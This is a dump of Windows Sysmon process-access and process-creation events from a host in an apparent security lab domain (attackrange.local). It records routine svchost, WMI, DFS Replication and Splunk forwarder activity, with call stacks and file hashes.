10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16B1-5F84-2D00-000000007F01}25042760C:\Windows\system32\DFSRs.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c2ea|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442028C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442028C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.340{5D479F2C-16A1-5F84-1000-000000007F01}11442028C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.340{5D479F2C-16A1-5F84-1000-000000007F01}11442028C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.340{5D479F2C-16A1-5F84-1000-000000007F01}11442028C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.340{5D479F2C-16B1-5F84-2D00-000000007F01}25042760C:\Windows\system32\DFSRs.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c0dd|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.340{5D479F2C-16B3-5F84-4300-000000007F01}39723976C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.277{5D479F2C-16B3-5F84-4000-000000007F01}39163984C:\Windows\system32\wbem\wmiprvse.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\System32\combase.dll+50a3b|C:\Windows\System32\combase.dll+a78d2|C:\Windows\System32\combase.dll+a81fe|C:\Windows\System32\combase.dll+a7fbf|C:\Windows\System32\combase.dll+46818|C:\Windows\System32\combase.dll+46430|C:\Windows\System32\combase.dll+54167|C:\Windows\System32\combase.dll+c1a64|C:\Windows\System32\combase.dll+521e1|C:\Windows\System32\combase.dll+52730|C:\Windows\System32\combase.dll+1fca|C:\Windows\System32\RPCRT4.dll+dbd2a|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b93|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-1000-000000007F01}11442364C:\Windows\system32\svchost.exe{5D479F2C-16B3-5F84-4000-000000007F01}3916C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+1016a|C:\Windows\system32\wbem\wbemcore.dll+2d15f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4300-000000007F01}3972C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4300-000000007F01}3972C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16B3-5F84-4200-000000007F01}39483952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B3-5F84-4300-000000007F01}3972C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.096{5D479F2C-16B3-5F84-4300-000000007F01}3972C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B3-5F84-4200-000000007F01}3948C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B3-5F84-4000-000000007F01}3916C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 